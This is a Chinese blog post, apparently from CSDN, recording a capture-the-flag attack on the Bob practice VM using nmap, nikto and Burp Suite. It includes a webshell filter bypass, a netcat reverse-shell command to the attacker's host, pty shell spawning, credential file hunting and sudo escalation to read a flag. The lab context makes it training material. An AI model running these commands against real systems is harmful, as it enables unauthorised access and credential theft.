Bob靶机攻击记录

最新推荐文章于 2023-08-14 19:18:03 发布
最新推荐文章于 2023-08-14 19:18:03 发布
阅读量324 收藏 2
点赞数 2
文章标签: 安全性测试 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56375711/article/details/126324726
版权

首先准备两台虚拟机,1Kali   2Bob靶机,并将它们都接到同一虚拟网卡上。

 

一、设备扫描

使用扫描工具nmap

nmap -sP 192.168.119.12/24   --------------扫描此网段存活的设备

发现192.168.119.126

nmap -A 192.168.119.126 -p- -oN nmap192.168.119.126   -----------收集目标主机的全部信息

发现其开着http服务(80端口)和ssh服务(25468端口  原始为22  说明被人为修改)

 

 

二、打开目标主机http网页,寻找有用信息

       发现目标网页是一个学校的网页,学校新闻中提到上周被黑客攻击,现已禁止外部登录

       除此之外无其它有用信息

 

 

三、网站信息收集

nikto -h http:192.168.119.129

除服务器基本信息外,意外发现三个隐藏目录,下一步尝试访问。

 

 打开/password.html发现是Bob留给我们的挑衅的话!!!

 

 接下来尝试访问webshell,发现uname可以访问,ls不能访问,说明其对输入进行了过滤 

 

 

 四、尝试绕过过滤机制

配置代理,使用burpsuit抓包。

将ls改为/bin/ls 绕过检测 得到目录结构

发现dev_shell.php.back文件,可能是webshell的备份文件

 

访问dev_shell.php.bak,下载到本地

打开后发现确实拥有黑名单

 

五、反弹shell 

kali:nc -lvvp 8888

靶机(burpsuit上操作):/bin/nc -e /bin/bash 192.168.119.128 8888

 

可以执行命令,拿到id=33的系统用户权限

 

 python 调用交互式bash

python -c "import pty; pty.spawn('/bin/bash')"

 

 进入服务器根目录,发现flag.txt!!!!!

cat一下发现没有权限

ls -l 查看权限,发现只有root用户有读权限

 

接下来想找root权限,首先进入etc/,打开passwd文件,发现bob用户 

到bob家目录看一下

 

 ls -a发现隐藏文件old_passwordfile.html

cat一下

找到jc的账号和密码(但通过登录jc账号发现其没有读flag.txt的权限)

 

 接着查看bob家目录其他文件,进入Documents之后一路cd下去,发现一串密码,藏头诗!

 

用密码打开Documents文件下的login.txt.gpg

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

发现系统用户无法打开

登录之前找到的jc账号  解开文件  得到bob密码

 

 登录bob账号,

发现有sudo权限,

sudo cat flag.txt  得到flag

 

 

 

m0_56375711
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透入门之BOB靶机渗透实战
CongM_JueD的博客
09-03 829
渗透入门初体验
2021-06-05trollcave1-2靶机攻击
qq_45290991的博客
06-05 276
一、信息收集 nmap发现开了22-80,wapplzer发现资产信息如下: (御剑扫描的后台) 看一下这个网站有什么东西,,发现不能注册(查看博客password reset可知禁止了重新注册新账户的功能),查看ruby on rails的框架历史漏洞cve-2018-xxx,结果不能利用。。有好几个账户,king(superadmin)、coderguy(admin),cooldude89(主持人),dave(admin),Ian(普通用户),尝试在login界面弱口令爆破账号密码,...
web 攻击靶机
dinghongzui6895的博客
04-22 501
一、sql注入靶机攻击 首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24 发现可疑ip地址192.168.2.129 并使用nmap扫描这个ip地址,发现其开放了ftp和http协议 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sq...
靶机Hacknos-1
weixin_50815573的博客
02-21 1623
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
bob靶机
weixin_52963334的博客
08-14 677
bob靶机实操
jangow靶机攻击流程
03-24
在这个“jangow靶机攻击流程”中,我们学习了如何逐步渗透一个靶机系统,从信息收集、漏洞利用到权限提升的过程。以下是每个步骤的详细解释: 步骤一:首先,设置靶机网络为桥接模式,并获取其IP地址。这是攻击前的...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
PWN靶机环境 网络安全
05-23
PWN靶机环境
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1116
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 905
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
记一次线下赛靶机攻击过程
hl1293348082的专栏
04-01 106
本人前几天,刚参加一场线下安全赛,特其中一台靶机攻击过程分享下其中的坑。 靶机IP :172.16.1.107 Web 访问似乎没什么有价值的东西 Nmap 看下是否有其他收获? 咋一眼看过去除了 80 端口的 web 以为就没其他端口了,尝试着进行全端口扫描发现,还是一样。 后来仔细进行 nmap -sV 扫描,还有一个 82 端口,尝试 web 访问。 存在一个 ucenter home 的站点,首先考虑了是否存在当前 cms 的漏洞 后来一想,如果单纯是 cms 的漏
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1968
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
靶机(potato-suncsr)——ssh暴力破解(工具包括:cewl(爬虫)、hydra(九头蛇)、nmap、arp-scan、dirsearch)
一大口木的博客
04-11 2168
第一次使用靶机,很好玩,我感觉靶机就是有漏洞的一个虚拟机,你可以在vmware里打开,然后用kali攻击,获取权限,或者盗取信息链接: https://pan.baidu.com/s/1KFYQkEP_KAr3lJZOfQ2-Ig?pwd=2cbh 提取码: 2cbh 复制这段内容后打开百度网盘手机App,操作更方便哦开始正题。
网络空间安全——攻防对抗 2.0
热门推荐
Jay
05-19 1万+
网络空间安全——攻防对抗 2 信息收集,使用kali,扫描己方靶机端口 21端口的ftp的攻击 ftp攻击方式,查看本机有哪些普通用户 admin/123456和guest/123456 然后提交flag 22端口的ssh攻击 使用session –I查看已经获取到的连接 使用session –I序号 获取连接 23 telnet的攻击方式 防御21-2...
Bob靶机游玩体验
WULI_KK的博客
01-08 410
这是一个十分好玩有趣且难度不高的渗透靶机拿取flag。
暴打bob靶机
qq_41263192的博客
09-04 3566
实验环境: kali:192.168.126.130 bob靶机:192.168.126.129 一、信息收集 扫描目标ip地址 扫描目标主机的端口发现有80端口,尝试登录网页查看在网页中查找到了相关信息 大意是,学校网站被黑客攻击,之后将不能登录网站之类的。 在网站的联系我们中找到了关键词:admin,所以推测bob J有可能是管理员 扫描网站的目录,继续查看网站的其他子目录这里只有状态码为200的网页才可以正常查看 查看robots.txt 目录,发现其下的隐藏目录 二、getshell 继续查
Vulnhub靶机 bob
菜浪马废的博客
04-28 251
一个用户名bob 一个提示:运行了webshell 尝试id 有回显 抓包看一下 /bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号 ssh登录 爆破文件 给了bob的账号
kali攻击linux靶机
最新发布
03-15
攻击Linux靶机是Kali Linux的一个常见用途之一。 在使用Kali Linux攻击Linux靶机之前,首先需要明确目的和合法性。只有在合法授权的情况下,才能使用Kali Linux进行渗透测试和漏洞评估。 以下是一般的攻击步骤: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值